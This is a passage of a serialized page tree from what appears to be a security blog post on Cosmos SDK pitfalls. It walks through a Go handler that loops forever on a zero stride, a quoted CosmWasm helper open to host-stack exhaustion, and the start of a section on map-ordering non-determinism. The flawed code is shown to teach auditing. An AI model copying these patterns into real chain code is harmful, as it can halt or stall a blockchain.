MsgSumWithStrideParams",{"type":28,"tag":116,"props":75803,"children":75804},{"style":376},[75805],{"type":33,"value":20814},{"type":28,"tag":116,"props":75807,"children":75808},{"style":266},[75809],{"type":33,"value":1291},{"type":28,"tag":116,"props":75811,"children":75812},{"class":245,"line":256},[75813,75818],{"type":28,"tag":116,"props":75814,"children":75815},{"style":272},[75816],{"type":33,"value":75817},"    Start",{"type":28,"tag":116,"props":75819,"children":75820},{"style":339},[75821],{"type":33,"value":75822}," uint64\n",{"type":28,"tag":116,"props":75824,"children":75825},{"class":245,"line":293},[75826,75831],{"type":28,"tag":116,"props":75827,"children":75828},{"style":272},[75829],{"type":33,"value":75830},"    Stride",{"type":28,"tag":116,"props":75832,"children":75833},{"style":339},[75834],{"type":33,"value":75822},{"type":28,"tag":116,"props":75836,"children":75837},{"class":245,"line":361},[75838,75843,75848],{"type":28,"tag":116,"props":75839,"children":75840},{"style":272},[75841],{"type":33,"value":75842},"    Arr",{"type":28,"tag":116,"props":75844,"children":75845},{"style":266},[75846],{"type":33,"value":75847}," []",{"type":28,"tag":116,"props":75849,"children":75850},{"style":339},[75851],{"type":33,"value":75852},"uint64\n",{"type":28,"tag":116,"props":75854,"children":75855},{"class":245,"line":387},[75856],{"type":28,"tag":116,"props":75857,"children":75858},{"style":266},[75859],{"type":33,"value":406},{"type":28,"tag":116,"props":75861,"children":75862},{"class":245,"line":400},[75863],{"type":28,"tag":116,"props":75864,"children":75865},{"emptyLinePlaceholder":19},[75866],{"type":33,"value":1044},{"type":28,"tag":116,"props":75868,"children":75869},{"class":245,"line":614},[75870,75874,75879,75883],{"type":28,"tag":116,"props":75871,"children":75872},{"style":376},[75873],{"type":33,"value":32394},{"type":28,"tag":116,"props":75875,"children":75876},{"style":339},[75877],{"type":33,"value":75878}," MsgSumWithStrideResponse",{"type":28,"tag":116,"props":75880,"children":75881},{"style":376},[75882],{"type":33,"value":20814},{"type":28,"tag":116,"props":75884,"children":75885},{"style":266},[75886],{"type":33,"value":1291},{"type":28,"tag":116,"props":75888,"children":75889},{"class":245,"line":631},[75890,75895],{"type":28,"tag":116,"props":75891,"children":75892},{"style":272},[75893],{"type":33,"value":75894},"    Sum",{"type":28,"tag":116,"props":75896,"children":75897},{"style":339},[75898],{"type":33,"value":75822},{"type":28,"tag":116,"props":75900,"children":75901},{"class":245,"line":665},[75902],{"type":28,"tag":116,"props":75903,"children":75904},{"style":266},[75905],{"type":33,"value":406},{"type":28,"tag":116,"props":75907,"children":75908},{"class":245,"line":713},[75909],{"type":28,"tag":116,"props":75910,"children":75911},{"emptyLinePlaceholder":19},[75912],{"type":33,"value":1044},{"type":28,"tag":116,"props":75914,"children":75915},{"class":245,"line":750},[75916,75921,75925,75930,75935,75939,75944],{"type":28,"tag":116,"props":75917,"children":75918},{"style":376},[75919],{"type":33,"value":75920},"func",{"type":28,"tag":116,"props":75922,"children":75923},{"style":266},[75924],{"type":33,"value":269},{"type":28,"tag":116,"props":75926,"children":75927},{"style":272},[75928],{"type":33,"value":75929},"ms ",{"type":28,"tag":116,"props":75931,"children":75932},{"style":339},[75933],{"type":33,"value":75934},"msgServer",{"type":28,"tag":116,"props":75936,"children":75937},{"style":266},[75938],{"type":33,"value":1609},{"type":28,"tag":116,"props":75940,"children":75941},{"style":282},[75942],{"type":33,"value":75943},"SumWithStride",{"type":28,"tag":116,"props":75945,"children":75946},{"style":266},[75947],{"type":33,"value":3133},{"type":28,"tag":116,"props":75949,"children":75950},{"class":245,"line":779},[75951,75956,75961,75965,75970],{"type":28,"tag":116,"props":75952,"children":75953},{"style":272},[75954],{"type":33,"value":75955},"    goCtx",{"type":28,"tag":116,"props":75957,"children":75958},{"style":339},[75959],{"type":33,"value":75960}," context",{"type":28,"tag":116,"props":75962,"children":75963},{"style":266},[75964],{"type":33,"value":141},{"type":28,"tag":116,"props":75966,"children":75967},{"style":339},[75968],{"type":33,"value":75969},"Context",{"type":28,"tag":116,"props":75971,"children":75972},{"style":266},[75973],{"type":33,"value":3178},{"type":28,"tag":116,"props":75975,"children":75976},{"class":245,"line":796},[75977,75982,75986,75991],{"type":28,"tag":116,"props":75978,"children":75979},{"style":272},[75980],{"type":33,"value":75981},"    msg",{"type":28,"tag":116,"props":75983,"children":75984},{"style":370},[75985],{"type":33,"value":9484},{"type":28,"tag":116,"props":75987,"children":75988},{"style":339},[75989],{"type":33,"value":75990},"MsgSumWithStrideParams",{"type":28,"tag":116,"props":75992,"children":75993},{"style":266},[75994],{"type":33,"value":3178},{"type":28,"tag":116,"props":75996,"children":75997},{"class":245,"line":847},[75998,76003,76007,76012,76016,76020],{"type":28,"tag":116,"props":75999,"children":76000},{"style":266},[76001],{"type":33,"value":76002},") (",{"type":28,"tag":116,"props":76004,"children":76005},{"style":370},[76006],{"type":33,"value":4240},{"type":28,"tag":116,"props":76008,"children":76009},{"style":339},[76010],{"type":33,"value":76011},"MsgSumWithStrideResponse",{"type":28,"tag":116,"props":76013,"children":76014},{"style":266},[76015],{"type":33,"value":825},{"type":28,"tag":116,"props":76017,"children":76018},{"style":339},[76019],{"type":33,"value":974},{"type":28,"tag":116,"props":76021,"children":76022},{"style":266},[76023],{"type":33,"value":844},{"type":28,"tag":116,"props":76025,"children":76026},{"class":245,"line":898},[76027,76032,76037,76042,76046,76050],{"type":28,"tag":116,"props":76028,"children":76029},{"style":272},[76030],{"type":33,"value":76031},"    sum",{"type":28,"tag":116,"props":76033,"children":76034},{"style":370},[76035],{"type":33,"value":76036}," :=",{"type":28,"tag":116,"props":76038,"children":76039},{"style":339},[76040],{"type":33,"value":76041}," uint64",{"type":28,"tag":116,"props":76043,"children":76044},{"style":266},[76045],{"type":33,"value":313},{"type":28,"tag":116,"props":76047,"children":76048},{"style":350},[76049],{"type":33,"value":353},{"type":28,"tag":116,"props":76051,"children":76052},{"style":266},[76053],{"type":33,"value":2830},{"type":28,"tag":116,"props":76055,"children":76056},{"class":245,"line":907},[76057,76062,76066,76070,76074,76078,76082,76086,76090,76095],{"type":28,"tag":116,"props":76058,"children":76059},{"style":272},[76060],{"type":33,"value":76061},"    end",{"type":28,"tag":116,"props":76063,"children":76064},{"style":370},[76065],{"type":33,"value":76036},{"type":28,"tag":116,"props":76067,"children":76068},{"style":339},[76069],{"type":33,"value":76041},{"type":28,"tag":116,"props":76071,"children":76072},{"style":266},[76073],{"type":33,"value":313},{"type":28,"tag":116,"props":76075,"children":76076},{"style":282},[76077],{"type":33,"value":8807},{"type":28,"tag":116,"props":76079,"children":76080},{"style":266},[76081],{"type":33,"value":313},{"type":28,"tag":116,"props":76083,"children":76084},{"style":272},[76085],{"type":33,"value":939},{"type":28,"tag":116,"props":76087,"children":76088},{"style":266},[76089],{"type":33,"value":141},{"type":28,"tag":116,"props":76091,"children":76092},{"style":272},[76093],{"type":33,"value":76094},"Arr",{"type":28,"tag":116,"props":76096,"children":76097},{"style":266},[76098],{"type":33,"value":19376},{"type":28,"tag":116,"props":76100,"children":76101},{"class":245,"line":981},[76102,76106,76111,76115,76120,76124,76129,76133,76138,76142,76147,76151,76155,76159,76163,76167,76172],{"type":28,"tag":116,"props":76103,"children":76104},{"style":260},[76105],{"type":33,"value":2703},{"type":28,"tag":116,"props":76107,"children":76108},{"style":272},[76109],{"type":33,"value":76110}," idx",{"type":28,"tag":116,"props":76112,"children":76113},{"style":370},[76114],{"type":33,"value":76036},{"type":28,"tag":116,"props":76116,"children":76117},{"style":272},[76118],{"type":33,"value":76119}," msg",{"type":28,"tag":116,"props":76121,"children":76122},{"style":266},[76123],{"type":33,"value":141},{"type":28,"tag":116,"props":76125,"children":76126},{"style":272},[76127],{"type":33,"value":76128},"Start",{"type":28,"tag":116,"props":76130,"children":76131},{"style":266},[76132],{"type":33,"value":16888},{"type":28,"tag":116,"props":76134,"children":76135},{"style":272},[76136],{"type":33,"value":76137},"idx",{"type":28,"tag":116,"props":76139,"children":76140},{"style":370},[76141],{"type":33,"value":8391},{"type":28,"tag":116,"props":76143,"children":76144},{"style":272},[76145],{"type":33,"value":76146}," end",{"type":28,"tag":116,"props":76148,"children":76149},{"style":266},[76150],{"type":33,"value":16888},{"type":28,"tag":116,"props":76152,"children":76153},{"style":272},[76154],{"type":33,"value":76137},{"type":28,"tag":116,"props":76156,"children":76157},{"style":370},[76158],{"type":33,"value":14728},{"type":28,"tag":116,"props":76160,"children":76161},{"style":272},[76162],{"type":33,"value":76119},{"type":28,"tag":116,"props":76164,"children":76165},{"style":266},[76166],{"type":33,"value":141},{"type":28,"tag":116,"props":76168,"children":76169},{"style":272},[76170],{"type":33,"value":76171},"Stride",{"type":28,"tag":116,"props":76173,"children":76174},{"style":266},[76175],{"type":33,"value":1291},{"type":28,"tag":116,"props":76177,"children":76178},{"class":245,"line":1011},[76179,76184,76188,76192,76196,76200,76204,76208],{"type":28,"tag":116,"props":76180,"children":76181},{"style":272},[76182],{"type":33,"value":76183},"        sum",{"type":28,"tag":116,"props":76185,"children":76186},{"style":370},[76187],{"type":33,"value":14728},{"type":28,"tag":116,"props":76189,"children":76190},{"style":272},[76191],{"type":33,"value":76119},{"type":28,"tag":116,"props":76193,"children":76194},{"style":266},[76195],{"type":33,"value":141},{"type":28,"tag":116,"props":76197,"children":76198},{"style":272},[76199],{"type":33,"value":76094},{"type":28,"tag":116,"props":76201,"children":76202},{"style":266},[76203],{"type":33,"value":347},{"type":28,"tag":116,"props":76205,"children":76206},{"style":272},[76207],{"type":33,"value":76137},{"type":28,"tag":116,"props":76209,"children":76210},{"style":266},[76211],{"type":33,"value":11440},{"type":28,"tag":116,"props":76213,"children":76214},{"class":245,"line":1029},[76215],{"type":28,"tag":116,"props":76216,"children":76217},{"style":266},[76218],{"type":33,"value":3025},{"type":28,"tag":116,"props":76220,"children":76221},{"class":245,"line":1038},[76222,76226,76230,76234,76239,76244,76248,76253,76258],{"type":28,"tag":116,"props":76223,"children":76224},{"style":260},[76225],{"type":33,"value":393},{"type":28,"tag":116,"props":76227,"children":76228},{"style":370},[76229],{"type":33,"value":6813},{"type":28,"tag":116,"props":76231,"children":76232},{"style":339},[76233],{"type":33,"value":76011},{"type":28,"tag":116,"props":76235,"children":76236},{"style":266},[76237],{"type":33,"value":76238},"{",{"type":28,"tag":116,"props":76240,"children":76241},{"style":272},[76242],{"type":33,"value":76243},"Sum",{"type":28,"tag":116,"props":76245,"children":76246},{"style":266},[76247],{"type":33,"value":14994},{"type":28,"tag":116,"props":76249,"children":76250},{"style":272},[76251],{"type":33,"value":76252},"sum",{"type":28,"tag":116,"props":76254,"children":76255},{"style":266},[76256],{"type":33,"value":76257},"}, ",{"type":28,"tag":116,"props":76259,"children":76260},{"style":376},[76261],{"type":33,"value":76262},"nil\n",{"type":28,"tag":116,"props":76264,"children":76265},{"class":245,"line":1047},[76266],{"type":28,"tag":116,"props":76267,"children":76268},{"style":266},[76269],{"type":33,"value":406},{"type":28,"tag":29,"props":76271,"children":76272},{},[76273,76275,76280,76281,76287],{"type":33,"value":76274},"The provided Solidity / Cosmos snippets feature a public function that calculates the sums of an array using a provided starting ",{"type":28,"tag":98,"props":76276,"children":76278},{"className":76277},[],[76279],{"type":33,"value":76137},{"type":33,"value":6985},{"type":28,"tag":98,"props":76282,"children":76284},{"className":76283},[],[76285],{"type":33,"value":76286},"stride",{"type":33,"value":76288},". It is crucial to note that this function lacks robustness. A keen observer might have already identified that if the user supplies a stride value of 0, the code will result in an infinite loop.",{"type":28,"tag":29,"props":76290,"children":76291},{},[76292],{"type":33,"value":76293},"While an infinite loop is not ideal for Solidity, it may still be tolerable. The underlying blockchain on which a smart contract operates is responsible for monitoring the gas and computation budget. It will intervene and terminate the execution at a certain point. Interestingly, those types of \"unhandled error\" patterns are quite common occurrences in contracts.",{"type":28,"tag":29,"props":76295,"children":76296},{},[76297],{"type":33,"value":76298},"However, the same logic does not directly apply to Cosmos. In Cosmos, users are responsible for implementing the entire L1, and there is no underlying computation budget tracker that automatically stops code execution. As a result, any potential logic DoS or infinite loop can directly lead to the custom Cosmos L1 chain halting or stalling.",{"type":28,"tag":29,"props":76300,"children":76301},{},[76302],{"type":33,"value":76303},"This toy scenario captures the importance of attention to error handling, edge cases, and overall robustness in Cosmos.",{"type":28,"tag":75,"props":76305,"children":76307},{"id":76306},"real-world-examples",[76308],{"type":33,"value":76309},"Real-World Examples",{"type":28,"tag":29,"props":76311,"children":76312},{},[76313],{"type":33,"value":76314},"Now, let's examine a few real-world instances.",{"type":28,"tag":29,"props":76316,"children":76317},{},[76318,76320,76326,76327,76333,76335,76341,76343,76349],{"type":33,"value":76319},"In the case of ",{"type":28,"tag":87,"props":76321,"children":76324},{"href":76322,"rel":76323},"https://github.com/JumpCrypto/security-research/blob/e900a400f763075bdae161f4fd6e36d70da1d844/advisories/2023-003-cosmwasm.md",[91],[76325],{"type":33,"value":17355},{"type":33,"value":6129},{"type":28,"tag":98,"props":76328,"children":76330},{"className":76329},[],[76331],{"type":33,"value":76332},"CosmWasm",{"type":33,"value":76334}," bug, the helper method ",{"type":28,"tag":98,"props":76336,"children":76338},{"className":76337},[],[76339],{"type":33,"value":76340},"write_to_contract",{"type":33,"value":76342}," negligently calls the untrusted Wasm function ",{"type":28,"tag":98,"props":76344,"children":76346},{"className":76345},[],[76347],{"type":33,"value":76348},"\"allocate\"",{"type":33,"value":141},{"type":28,"tag":29,"props":76351,"children":76352},{},[76353],{"type":28,"tag":87,"props":76354,"children":76357},{"href":76355,"rel":76356},"https://github.com/CosmWasm/cosmwasm/blob/db426f9b15eabf18359df62878847bbaa7cb85ef/packages/vm/src/imports.rs#L409",[91],[76358],{"type":33,"value":76359},"Permalink for snippet",{"type":28,"tag":234,"props":76361,"children":76363},{"code":76362,"language":2651,"meta":7,"className":2652,"style":7},"fn write_to_contract\u003CA: BackendApi, S: Storage, Q: Querier>(\n    env: &Environment\u003CA, S, Q>,\n    input: &[u8],\n) -> VmResult\u003Cu32> {\n    let out_size = to_u32(input.len())?;\n    let result = env.call_function1(\"allocate\", &[out_size.into()])?;\n    let target_ptr = ref_to_u32(&result)?;\n    if target_ptr == 0 {\n        return Err(CommunicationError::zero_address().into());\n    }\n    write_region(&env.memory(), target_ptr, input)?;\n    Ok(target_ptr)\n}\n",[76364],{"type":28,"tag":98,"props":76365,"children":76366},{"__ignoreMap":7},[76367,76436,76484,76512,76541,76590,76664,76709,76732,76777,76784,76841,76860],{"type":28,"tag":116,"props":76368,"children":76369},{"class":245,"line":246},[76370,76374,76379,76383,76388,76392,76397,76401,76405,76409,76414,76418,76423,76427,76432],{"type":28,"tag":116,"props":76371,"children":76372},{"style":376},[76373],{"type":33,"value":19930},{"type":28,"tag":116,"props":76375,"children":76376},{"style":282},[76377],{"type":33,"value":76378}," write_to_contract",{"type":28,"tag":116,"props":76380,"children":76381},{"style":266},[76382],{"type":33,"value":514},{"type":28,"tag":116,"props":76384,"children":76385},{"style":339},[76386],{"type":33,"value":76387},"A",{"type":28,"tag":116,"props":76389,"children":76390},{"style":370},[76391],{"type":33,"value":4160},{"type":28,"tag":116,"props":76393,"children":76394},{"style":339},[76395],{"type":33,"value":76396}," BackendApi",{"type":28,"tag":116,"props":76398,"children":76399},{"style":266},[76400],{"type":33,"value":825},{"type":28,"tag":116,"props":76402,"children":76403},{"style":339},[76404],{"type":33,"value":21712},{"type":28,"tag":116,"props":76406,"children":76407},{"style":370},[76408],{"type":33,"value":4160},{"type":28,"tag":116,"props":76410,"children":76411},{"style":339},[76412],{"type":33,"value":76413}," Storage",{"type":28,"tag":116,"props":76415,"children":76416},{"style":266},[76417],{"type":33,"value":825},{"type":28,"tag":116,"props":76419,"children":76420},{"style":339},[76421],{"type":33,"value":76422},"Q",{"type":28,"tag":116,"props":76424,"children":76425},{"style":370},[76426],{"type":33,"value":4160},{"type":28,"tag":116,"props":76428,"children":76429},{"style":339},[76430],{"type":33,"value":76431}," Querier",{"type":28,"tag":116,"props":76433,"children":76434},{"style":266},[76435],{"type":33,"value":6260},{"type":28,"tag":116,"props":76437,"children":76438},{"class":245,"line":256},[76439,76443,76447,76451,76456,76460,76464,76468,76472,76476,76480],{"type":28,"tag":116,"props":76440,"children":76441},{"style":272},[76442],{"type":33,"value":3510},{"type":28,"tag":116,"props":76444,"children":76445},{"style":370},[76446],{"type":33,"value":4160},{"type":28,"tag":116,"props":76448,"children":76449},{"style":370},[76450],{"type":33,"value":6813},{"type":28,"tag":116,"props":76452,"children":76453},{"style":339},[76454],{"type":33,"value":76455},"Environment",{"type":28,"tag":116,"props":76457,"children":76458},{"style":266},[76459],{"type":33,"value":514},{"type":28,"tag":116,"props":76461,"children":76462},{"style":339},[76463],{"type":33,"value":76387},{"type":28,"tag":116,"props":76465,"children":76466},{"style":266},[76467],{"type":33,"value":825},{"type":28,"tag":116,"props":76469,"children":76470},{"style":339},[76471],{"type":33,"value":21712},{"type":28,"tag":116,"props":76473,"children":76474},{"style":266},[76475],{"type":33,"value":825},{"type":28,"tag":116,"props":76477,"children":76478},{"style":339},[76479],{"type":33,"value":76422},{"type":28,"tag":116,"props":76481,"children":76482},{"style":266},[76483],{"type":33,"value":5809},{"type":28,"tag":116,"props":76485,"children":76486},{"class":245,"line":293},[76487,76492,76496,76500,76504,76508],{"type":28,"tag":116,"props":76488,"children":76489},{"style":272},[76490],{"type":33,"value":76491},"    input",{"type":28,"tag":116,"props":76493,"children":76494},{"style":370},[76495],{"type":33,"value":4160},{"type":28,"tag":116,"props":76497,"children":76498},{"style":370},[76499],{"type":33,"value":6813},{"type":28,"tag":116,"props":76501,"children":76502},{"style":266},[76503],{"type":33,"value":347},{"type":28,"tag":116,"props":76505,"children":76506},{"style":339},[76507],{"type":33,"value":3091},{"type":28,"tag":116,"props":76509,"children":76510},{"style":266},[76511],{"type":33,"value":13929},{"type":28,"tag":116,"props":76513,"children":76514},{"class":245,"line":361},[76515,76519,76523,76528,76532,76537],{"type":28,"tag":116,"props":76516,"children":76517},{"style":266},[76518],{"type":33,"value":1609},{"type":28,"tag":116,"props":76520,"children":76521},{"style":370},[76522],{"type":33,"value":13423},{"type":28,"tag":116,"props":76524,"children":76525},{"style":339},[76526],{"type":33,"value":76527}," VmResult",{"type":28,"tag":116,"props":76529,"children":76530},{"style":266},[76531],{"type":33,"value":514},{"type":28,"tag":116,"props":76533,"children":76534},{"style":339},[76535],{"type":33,"value":76536},"u32",{"type":28,"tag":116,"props":76538,"children":76539},{"style":266},[76540],{"type":33,"value":6952},{"type":28,"tag":116,"props":76542,"children":76543},{"class":245,"line":387},[76544,76548,76553,76557,76562,76566,76570,76574,76578,76582,76586],{"type":28,"tag":116,"props":76545,"children":76546},{"style":376},[76547],{"type":33,"value":2672},{"type":28,"tag":116,"props":76549,"children":76550},{"style":272},[76551],{"type":33,"value":76552}," out_size",{"type":28,"tag":116,"props":76554,"children":76555},{"style":370},[76556],{"type":33,"value":2226},{"type":28,"tag":116,"props":76558,"children":76559},{"style":282},[76560],{"type":33,"value":76561}," to_u32",{"type":28,"tag":116,"props":76563,"children":76564},{"style":266},[76565],{"type":33,"value":313},{"type":28,"tag":116,"props":76567,"children":76568},{"style":272},[76569],{"type":33,"value":8039},{"type":28,"tag":116,"props":76571,"children":76572},{"style":370},[76573],{"type":33,"value":141},{"type":28,"tag":116,"props":76575,"children":76576},{"style":282},[76577],{"type":33,"value":8807},{"type":28,"tag":116,"props":76579,"children":76580},{"style":266},[76581],{"type":33,"value":41585},{"type":28,"tag":116,"props":76583,"children":76584},{"style":370},[76585],{"type":33,"value":2825},{"type":28,"tag":116,"props":76587,"children":76588},{"style":266},[76589],{"type":33,"value":384},{"type":28,"tag":116,"props":76591,"children":76592},{"class":245,"line":400},[76593,76597,76601,76605,76609,76613,76618,76622,76626,76630,76634,76638,76643,76647,76651,76656,76660],{"type":28,"tag":116,"props":76594,"children":76595},{"style":376},[76596],{"type":33,"value":2672},{"type":28,"tag":116,"props":76598,"children":76599},{"style":272},[76600],{"type":33,"value":8828},{"type":28,"tag":116,"props":76602,"children":76603},{"style":370},[76604],{"type":33,"value":2226},{"type":28,"tag":116,"props":76606,"children":76607},{"style":272},[76608],{"type":33,"value":42579},{"type":28,"tag":116,"props":76610,"children":76611},{"style":370},[76612],{"type":33,"value":141},{"type":28,"tag":116,"props":76614,"children":76615},{"style":282},[76616],{"type":33,"value":76617},"call_function1",{"type":28,"tag":116,"props":76619,"children":76620},{"style":266},[76621],{"type":33,"value":313},{"type":28,"tag":116,"props":76623,"children":76624},{"style":563},[76625],{"type":33,"value":76348},{"type":28,"tag":116,"props":76627,"children":76628},{"style":266},[76629],{"type":33,"value":825},{"type":28,"tag":116,"props":76631,"children":76632},{"style":370},[76633],{"type":33,"value":2780},{"type":28,"tag":116,"props":76635,"children":76636},{"style":266},[76637],{"type":33,"value":347},{"type":28,"tag":116,"props":76639,"children":76640},{"style":272},[76641],{"type":33,"value":76642},"out_size",{"type":28,"tag":116,"props":76644,"children":76645},{"style":370},[76646],{"type":33,"value":141},{"type":28,"tag":116,"props":76648,"children":76649},{"style":282},[76650],{"type":33,"value":14549},{"type":28,"tag":116,"props":76652,"children":76653},{"style":266},[76654],{"type":33,"value":76655},"()])",{"type":28,"tag":116,"props":76657,"children":76658},{"style":370},[76659],{"type":33,"value":2825},{"type":28,"tag":116,"props":76661,"children":76662},{"style":266},[76663],{"type":33,"value":384},{"type":28,"tag":116,"props":76665,"children":76666},{"class":245,"line":614},[76667,76671,76676,76680,76685,76689,76693,76697,76701,76705],{"type":28,"tag":116,"props":76668,"children":76669},{"style":376},[76670],{"type":33,"value":2672},{"type":28,"tag":116,"props":76672,"children":76673},{"style":272},[76674],{"type":33,"value":76675}," target_ptr",{"type":28,"tag":116,"props":76677,"children":76678},{"style":370},[76679],{"type":33,"value":2226},{"type":28,"tag":116,"props":76681,"children":76682},{"style":282},[76683],{"type":33,"value":76684}," ref_to_u32",{"type":28,"tag":116,"props":76686,"children":76687},{"style":266},[76688],{"type":33,"value":313},{"type":28,"tag":116,"props":76690,"children":76691},{"style":370},[76692],{"type":33,"value":2780},{"type":28,"tag":116,"props":76694,"children":76695},{"style":272},[76696],{"type":33,"value":8751},{"type":28,"tag":116,"props":76698,"children":76699},{"style":266},[76700],{"type":33,"value":1829},{"type":28,"tag":116,"props":76702,"children":76703},{"style":370},[76704],{"type":33,"value":2825},{"type":28,"tag":116,"props":76706,"children":76707},{"style":266},[76708],{"type":33,"value":384},{"type":28,"tag":116,"props":76710,"children":76711},{"class":245,"line":631},[76712,76716,76720,76724,76728],{"type":28,"tag":116,"props":76713,"children":76714},{"style":260},[76715],{"type":33,"value":11947},{"type":28,"tag":116,"props":76717,"children":76718},{"style":272},[76719],{"type":33,"value":76675},{"type":28,"tag":116,"props":76721,"children":76722},{"style":370},[76723],{"type":33,"value":2953},{"type":28,"tag":116,"props":76725,"children":76726},{"style":350},[76727],{"type":33,"value":2718},{"type":28,"tag":116,"props":76729,"children":76730},{"style":266},[76731],{"type":33,"value":1291},{"type":28,"tag":116,"props":76733,"children":76734},{"class":245,"line":665},[76735,76739,76743,76747,76752,76756,76761,76765,76769,76773],{"type":28,"tag":116,"props":76736,"children":76737},{"style":260},[76738],{"type":33,"value":15405},{"type":28,"tag":116,"props":76740,"children":76741},{"style":339},[76742],{"type":33,"value":15410},{"type":28,"tag":116,"props":76744,"children":76745},{"style":266},[76746],{"type":33,"value":313},{"type":28,"tag":116,"props":76748,"children":76749},{"style":339},[76750],{"type":33,"value":76751},"CommunicationError",{"type":28,"tag":116,"props":76753,"children":76754},{"style":370},[76755],{"type":33,"value":3151},{"type":28,"tag":116,"props":76757,"children":76758},{"style":282},[76759],{"type":33,"value":76760},"zero_address",{"type":28,"tag":116,"props":76762,"children":76763},{"style":266},[76764],{"type":33,"value":13545},{"type":28,"tag":116,"props":76766,"children":76767},{"style":370},[76768],{"type":33,"value":141},{"type":28,"tag":116,"props":76770,"children":76771},{"style":282},[76772],{"type":33,"value":14549},{"type":28,"tag":116,"props":76774,"children":76775},{"style":266},[76776],{"type":33,"value":1577},{"type":28,"tag":116,"props":76778,"children":76779},{"class":245,"line":713},[76780],{"type":28,"tag":116,"props":76781,"children":76782},{"style":266},[76783],{"type":33,"value":3025},{"type":28,"tag":116,"props":76785,"children":76786},{"class":245,"line":750},[76787,76792,76796,76800,76804,76808,76812,76816,76821,76825,76829,76833,76837],{"type":28,"tag":116,"props":76788,"children":76789},{"style":282},[76790],{"type":33,"value":76791},"    write_region",{"type":28,"tag":116,"props":76793,"children":76794},{"style":266},[76795],{"type":33,"value":313},{"type":28,"tag":116,"props":76797,"children":76798},{"style":370},[76799],{"type":33,"value":2780},{"type":28,"tag":116,"props":76801,"children":76802},{"style":272},[76803],{"type":33,"value":35316},{"type":28,"tag":116,"props":76805,"children":76806},{"style":370},[76807],{"type":33,"value":141},{"type":28,"tag":116,"props":76809,"children":76810},{"style":282},[76811],{"type":33,"value":75592},{"type":28,"tag":116,"props":76813,"children":76814},{"style":266},[76815],{"type":33,"value":18038},{"type":28,"tag":116,"props":76817,"children":76818},{"style":272},[76819],{"type":33,"value":76820},"target_ptr",{"type":28,"tag":116,"props":76822,"children":76823},{"style":266},[76824],{"type":33,"value":825},{"type":28,"tag":116,"props":76826,"children":76827},{"style":272},[76828],{"type":33,"value":8039},{"type":28,"tag":116,"props":76830,"children":76831},{"style":266},[76832],{"type":33,"value":1829},{"type":28,"tag":116,"props":76834,"children":76835},{"style":370},[76836],{"type":33,"value":2825},{"type":28,"tag":116,"props":76838,"children":76839},{"style":266},[76840],{"type":33,"value":384},{"type":28,"tag":116,"props":76842,"children":76843},{"class":245,"line":779},[76844,76848,76852,76856],{"type":28,"tag":116,"props":76845,"children":76846},{"style":339},[76847],{"type":33,"value":13999},{"type":28,"tag":116,"props":76849,"children":76850},{"style":266},[76851],{"type":33,"value":313},{"type":28,"tag":116,"props":76853,"children":76854},{"style":272},[76855],{"type":33,"value":76820},{"type":28,"tag":116,"props":76857,"children":76858},{"style":266},[76859],{"type":33,"value":2830},{"type":28,"tag":116,"props":76861,"children":76862},{"class":245,"line":796},[76863],{"type":28,"tag":116,"props":76864,"children":76865},{"style":266},[76866],{"type":33,"value":406},{"type":28,"tag":29,"props":76868,"children":76869},{},[76870,76872,76878,76880,76885],{"type":33,"value":76871},"As users have complete control over ",{"type":28,"tag":98,"props":76873,"children":76875},{"className":76874},[],[76876],{"type":33,"value":76877},"allocate",{"type":33,"value":76879},", there is a possibility to call back ",{"type":28,"tag":98,"props":76881,"children":76883},{"className":76882},[],[76884],{"type":33,"value":76340},{"type":33,"value":76886}," repeatedly through other imported functions. This can result in the depletion of the host stack and ultimately lead to a DoS.",{"type":28,"tag":29,"props":76888,"children":76889},{},[76890,76892,76899],{"type":33,"value":76891},"Additional real-world examples include ",{"type":28,"tag":87,"props":76893,"children":76896},{"href":76894,"rel":76895},"https://github.com/cosmos/cosmos-sdk/issues/16676",[91],[76897],{"type":33,"value":76898},"not returning proper values for malformed txs",{"type":33,"value":141},{"type":28,"tag":63,"props":76901,"children":76903},{"id":76902},"order-was-the-dream-of-man",[76904],{"type":33,"value":76905},"Order Was the Dream of Man",{"type":28,"tag":29,"props":76907,"children":76908},{},[76909],{"type":33,"value":76910},"Different from solidity, which is a domain-specific language for smart contracts, Golang is not. Therefore, developers must be mindful of specific footguns. One notable instance is non-determinism.",{"type":28,"tag":29,"props":76912,"children":76913},{},[76914],{"type":33,"value":76915},"Consider a scenario where there is a requirement to emit an event for every entry in a map. It might be tempting to implement this as demonstrated below:",{"type":28,"tag":234,"props":76917,"children":76919},{"code":76918,"language":75784,"meta":7,"className":75785,"style":7},"type ObjectMap map[string]string\n\nfunc EmitEntries(objectMap ObjectMap) {\n    for key, value := range objectMap {\n        ctx.EventManager.EmitEvent(\n            sdk.NewEvent(\n                \"MapContext\",\n                sdk.NewAttribute(key, value),\n            )\n        )\n    }\n}\n",[76920],{"type":28,"tag":98,"props":76921,"children":76922},{"__ignoreMap":7},[76923,76956,76963,76992,77029,77058,77079,77091,77128,77136,77143,77150],{"type":28,"tag":116,"props":76924,"children":76925},{"class":245,"line":246},[76926,76930,76935,76939,76943,76947,76951],{"type":28,"tag":116,"props":76927,"children":76928},{"style":376},[76929],{"type":33,"value":32394},{"type":28,"tag":116,"props":76931,"children":76932},{"style":339},[76933],{"type":33,"value":76934}," ObjectMap",{"type":28,"tag":116,"props":76936,"children":76937},{"style":376},[76938],{"type":33,"value":49290},{"type":28,"tag":116,"props":76940,"children":76941},{"style":266},[76942],{"type":33,"value":347},{"type":28,"tag":116,"props":76944,"children":76945},{"style":339},[76946],{"type":33,"value":29322},{"type":28,"tag":116,"props":76948,"children":76949},{"style":266},[76950],{"type":33,"value":15074},{"type":28,"tag":116,"props":76952,"children":76953},{"style":339},[76954],{"type":33,"value":76955},"string\n",{"type":28,"tag":116,"props":76957,"children":76958},{"class":245,"line":256},[76959],{"type":28,"tag":116,"props":76960,"children":76961},{"emptyLinePlaceholder":19},[76962],{"type":33,"value":1044},{"type":28,"tag":116,"props":76964,"children":76965},{"class":245,"line":293},[76966,76970,76975,76979,76984,76988],{"type":28,"tag":116,"props":76967,"children":76968},{"style":376},[76969],{"type":33,"value":75920},{"type":28,"tag":116,"props":76971,"children":76972},{"style":282},[76973],{"type":33,"value":76974}," 